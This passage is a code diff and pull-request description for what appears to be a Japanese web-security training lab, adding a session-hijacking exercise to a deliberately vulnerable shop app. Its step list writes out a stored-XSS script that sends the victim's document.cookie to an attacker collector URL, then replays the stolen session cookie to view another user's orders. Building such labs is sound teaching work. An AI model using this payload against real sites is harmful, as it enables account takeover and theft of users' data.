     attackerSessionHijackUrl: ATTACKER_URL + "/session-hijack"
   });
 });

--- a/apps/shop/views/hands_on.ejs
+++ b/apps/shop/views/hands_on.ejs
@@ -91,7 +91,7 @@
     </div>
     <ol>
       <li><a href="/login">ログイン</a>（alice / password123）して<a href="/products/1">商品詳細</a>を開く</li>
-      <li>コメント欄に <code>&lt;script&gt;fetch('http://localhost:9000/collect?cookie=' + encodeURIComponent(document.cookie))&lt;/script&gt;</code> を投稿する</li>
+      <li>コメント欄に <code>&lt;script&gt;fetch('<%= attackerCollectorUrl %>?cookie=' + encodeURIComponent(document.cookie))&lt;/script&gt;</code> を投稿する</li>
       <li>商品詳細を再表示し、保存型XSSで Cookie が Attacker 側へ送られることを発生させる</li>
       <li>新しいタブで<a href="<%= attackerSessionHijackUrl %>" target="_blank" rel="noreferrer">Session Hijack ページ</a>を開き、盗まれた <code>connect.sid</code> を確認する</li>
       <li>「盗んだセッションで注文履歴を見る」を押し、被害者として注文履歴へアクセスできることを確認する</li>

--- a/apps/shop/views/hands_on.ejs
+++ b/apps/shop/views/hands_on.ejs
@@ -83,6 +83,21 @@
     </ol>
     <p class="muted">原因: リクエストが「正しい画面から送られたか」をサーバーが検証していない</p>
   </div>
+
+  <div class="card stack">
+    <div class="section-title">
+      <span class="pill">Session</span>
+      <h3 style="margin: 0;">体験⑤ セッションハイジャック</h3>
+    </div>
+    <ol>
+      <li><a href="/login">ログイン</a>（alice / password123）して<a href="/products/1">商品詳細</a>を開く</li>
+      <li>コメント欄に <code>&lt;script&gt;fetch('http://localhost:9000/collect?cookie=' + encodeURIComponent(document.cookie))&lt;/script&gt;</code> を投稿する</li>
+      <li>商品詳細を再表示し、保存型XSSで Cookie が Attacker 側へ送られることを発生させる</li>
+      <li>新しいタブで<a href="<%= attackerSessionHijackUrl %>" target="_blank" rel="noreferrer">Session Hijack ページ</a>を開き、盗まれた <code>connect.sid</code> を確認する</li>
+      <li>「盗んだセッションで注文履歴を見る」を押し、被害者として注文履歴へアクセスできることを確認する</li>
+    </ol>
+    <p class="muted">原因: XSS と JavaScript から読めるセッションCookieが組み合わさり、攻撃者が被害者のログイン状態を再利用できる</p>
+  </div>
 </div>
 
 <%- include("partials/footer") %>

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -22,7 +22,7 @@ services:
       context: ./apps/attacker
     environment:
       - PORT=9000
-      - TARGET_BASE=http://localhost:8000
+      - TARGET_BASE=http://shop:8000
     ports:
       - "9000:9000"
     volumes:


### PR DESCRIPTION
## Summary
- add attacker-side cookie collection and session replay flow for the session hijacking hands-on
- add a session hijack guide page and wire the shop Hands-on page to it using runtime attacker URLs
- document the new scenario in README and cover the attacker flow with HTTP tests

## Testing
- npm test (in apps/attacker)
- node --check apps/attacker/server.js
- node --check apps/shop/src/server.js